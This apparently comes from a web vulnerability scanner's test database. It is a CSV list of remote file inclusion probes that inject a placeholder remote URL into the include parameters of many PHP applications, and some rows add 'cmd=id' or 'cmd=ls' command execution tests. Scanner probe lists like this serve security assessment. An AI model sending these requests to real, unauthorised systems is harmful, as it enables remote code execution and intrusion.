"004956","5292","c","/include/pear/IT_Error.php?basepath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004957","5292","c","/include/pear/IT_Error.php?basepath=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004958","5292","c","/include/phpxd/phpXD.php?appconf[rootpath]=@RFIURL?&cmd=id","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004959","5292","c","/include/prodler.class.php?sPath=@RFIURL???","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004960","5292","c","/include/scripts/export_batch.inc.php?DIR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004961","5292","c","/include/scripts/run_auto_suspend.cron.php?DIR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004962","5292","c","/include/scripts/send_email_cache.php?DIR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004963","5292","c","/include/startup.inc.php?root_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004964","5292","c","/include/themes/themefunc.php?myNewsConf[path][sys][index]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004965","5292","c","/include/timesheet.php?config[include_dir]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004966","5292","c","/include/urights.php?CRM_inc=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004967","5292","c","/includes/admin_board2.php?phpbb_root_path=@RFIURL?ls","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004968","5292","c","/includes/admin_logger.php?phpbb_root_path=@RFIURL?ls","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004969","5292","c","/includes/adodb/back/adodb-postgres7.inc.php?ADODB_DIR=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004970","5292","c","/includes/ajax_listado.php?urlModulo=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004971","5292","c","/includes/archive/archive_topic.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004972","5292","c","/includes/archive/archive_topic.php?phpbb_root_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004973","5292","c","/includes/bbcb_mg.php?phpbb_root_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004974","5292","c","/includes/begin.inc.php?PagePrefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004975","5292","c","/includes/blogger.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004976","5292","c","/includes/class/class_tpl.php?cache_file=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004977","5292","c","/includes/class_template.php?quezza_root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004978","5292","c","/includes/classes/pctemplate.php?pcConfig[smartyPath]=@RFIURL?cmd","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004979","5292","c","/includes/common.inc.php?CONFIG[BASE_PATH]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004980","5292","c","/includes/common.php?module_root_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004981","5292","c","/includes/common.php?root=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004982","5292","c","/includes/common.php?root=@RFIURL??","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004983","5292","c","/includes/common.php?root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004984","5292","c","/includes/common.php?root_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004985","5292","c","/includes/config.inc.php?racineTBS=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004986","5292","c","/includes/config/master.inc.php?fm_data[root]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004987","5292","c","/includes/config/master.inc.php?fm_data[root]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004988","5292","c","/includes/connection.inc.php?PagePrefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004989","5292","c","/includes/dbal.php?eqdkp_root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004990","5292","c","/includes/events.inc.php?PagePrefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004991","5292","c","/includes/footer.html.inc.php?tc_config[app_root]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004992","5292","c","/includes/footer.inc.php?PagePrefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004993","5292","c","/includes/footer.php?PHPGREETZ_INCLUDE_DIR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004994","5292","c","/includes/functions.inc.php?sitepath=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004995","5292","c","/includes/functions.php?location=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004996","5292","c","/includes/functions.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004997","5292","c","/includes/functions.php?phpbb_root_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004998","5292","c","/includes/functions/auto_email_notify.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004999","5292","c","/includes/functions/html_generate.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005000","5292","c","/includes/functions/master.inc.php?fm_data[root]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005001","5292","c","/includes/functions/master.inc.php?fm_data[root]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005002","5292","c","/includes/functions/validations.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005003","5292","c","/includes/functions_admin.php?phpbb_root_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005004","5292","c","/includes/functions_install.php?vwar_root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005005","5292","c","/includes/functions_kb.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005006","5292","c","/includes/functions_kb.php?phpbb_root_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005007","5292","c","/includes/functions_mod_user.php?phpbb_root_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005008","5292","c","/includes/functions_portal.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005009","5292","c","/includes/functions_portal.php?phpbb_root_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005010","5292","c","/includes/functions_user_viewed_posts.php?phpbb_root_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005011","5292","c","/includes/global.php?nbs=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005012","5292","c","/includes/header.inc.php?PagePrefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005013","5292","c","/includes/header.inc.php?dateiPfad=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005014","5292","c","/includes/include_once.php?include_file=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005015","5292","c","/includes/init.php?includepath=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005016","5292","c","/includes/iplogger.php?phpbb_root_path=@RFIURL?ls","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005017","5292","c","/includes/kb_constants.php?module_root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005018","5292","c","/includes/kb_constants.php?module_root_path=@RFIURL?cmd=ls","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005019","5292","c","/includes/lang/language.php?path_to_root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005020","5292","c","/includes/lib-account.inc.php?CONF_CONFIG_PATH=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005021","5292","c","/includes/lib-group.inc.php?CONF_CONFIG_PATH=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005022","5292","c","/includes/lib-log.inc.php?CONF_CONFIG_PATH=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005023","5292","c","/includes/lib-mydb.inc.php?CONF_CONFIG_PATH=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005024","5292","c","/includes/lib-template-mod.inc.php?CONF_CONFIG_PATH=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005025","5292","c","/includes/lib-themes.inc.php?CONF_CONFIG_PATH=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005026","5292","c","/includes/logger_engine.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005027","5292","c","/includes/menuleft.inc.php?PagePrefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005028","5292","c","/includes/mkb.php?phpbb_root_path=@RFIURL?ls","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005029","5292","c","/includes/morcegoCMS/adodb/adodb.inc.php?path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005030","5292","c","/includes/morcegoCMS/morcegoCMS.php?fichero=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005031","5292","c","/includes/mx_common.php?module_root_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005032","5292","c","/includes/openid/Auth/OpenID/BBStore.php?openid_root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005033","5292","c","/includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005034","5292","c","/includes/pafiledb_constants.php?module_root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005035","5292","c","/includes/pages.inc.php?PagePrefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005036","5292","c","/includes/phpdig/includes/config.php?relative_script_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005037","5292","c","/includes/profilcp_constants.php?module_root_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005038","5292","c","/includes/settings.inc.php?approot=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005039","5292","c","/includes/template.php?myevent_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005040","5292","c","/includes/themen_portal_mitte.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005041","5292","c","/includes/tumbnail.php?config[root_ordner]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005042","5292","c","/includes/usercp_register.php?phpbb_root_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005043","5292","c","/includes/usercp_viewprofile.php?phpbb_root_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005044","5292","c","/includes/xhtml.php?d_root=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005045","5292","c","/index.php3?Application_Root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005046","5292","c","/index.php?1=lol&PAGES[lol]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005047","5292","c","/index.php?AML_opensite=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005048","5292","c","/index.php?AMV_openconfig=1&AMV_serverpath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005049","5292","c","/index.php?CONFIG[MWCHAT_Libs]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005050","5292","c","/index.php?ConfigDir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005051","5292","c","/index.php?DIR_PLUGINS=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005052","5292","c","/index.php?G_JGALL[inc_path]=@RFIURL%00","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005053","5292","c","/index.php?HomeDir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005054","5292","c","/index.php?Lang=AR&Page=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005055","5292","c","/index.php?Madoa=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005056","5292","c","/index.php?RP_PATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005057","5292","c","/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005058","5292","c","/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005059","5292","c","/index.php?abg_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005060","5292","c","/index.php?abs_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005061","5292","c","/index.php?abs_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005062","5292","c","/index.php?adduser=true&lang=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005063","5292","c","/index.php?adodb=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005064","5292","c","/index.php?ads_file=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005065","5292","c","/index.php?arquivo=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005066","5292","c","/index.php?back=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005067","5292","c","/index.php?base==@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005068","5292","c","/index.php?basePath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005069","5292","c","/index.php?bibtexrootrel=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005070","5292","c","/index.php?blog_dc_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005071","5292","c","/index.php?blog_theme=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005072","5292","c","/index.php?body=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005073","5292","c","/index.php?class_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005074","5292","c","/index.php?classified_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005075","5292","c","/index.php?cms=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005076","5292","c","/index.php?config[\"sipssys\"]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005077","5292","c","/index.php?config[root_ordner]=@RFIURL?&cmd=id","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005078","5292","c","/index.php?config[root_ordner]=@RFIURL?cmd=id","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005079","5292","c","/index.php?config_atkroot=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005080","5292","c","/index.php?configuration=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005081","5292","c","/index.php?custom_admin_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005082","5292","c","/index.php?dateiPfad=@RFIURL?&cmd=ls","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005083","5292","c","/index.php?de=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005084","5292","c","/index.php?dept=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005085","5292","c","/index.php?do=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005086","5292","c","/index.php?exec=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005087","5292","c","/index.php?ext=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005088","5292","c","/index.php?faq_path=@RFIURL?&cmd=id","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005089","5292","c","/index.php?file_name[]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005090","5292","c","/index.php?file_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005091","5292","c","/index.php?fileloc=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005092","5292","c","/index.php?from=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005093","5292","c","/index.php?func=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005094","5292","c","/index.php?function=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005095","5292","c","/index.php?function=custom&custom=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005096","5292","c","/index.php?gOo=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005097","5292","c","/index.php?gen=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005098","5292","c","/index.php?get=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005099","5292","c","/index.php?home_name=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005100","5292","c","/index.php?ilang=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005101","5292","c","/index.php?inc_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005102","5292","c","/index.php?inc_dir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005103","5292","c","/index.php?includeDir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005104","5292","c","/index.php?includeFooter=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005105","5292","c","/index.php?includesdir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005106","5292","c","/index.php?insPath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005107","5292","c","/index.php?lang=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005108","5292","c","/index.php?language=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005109","5292","c","/index.php?language=en&main_page=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
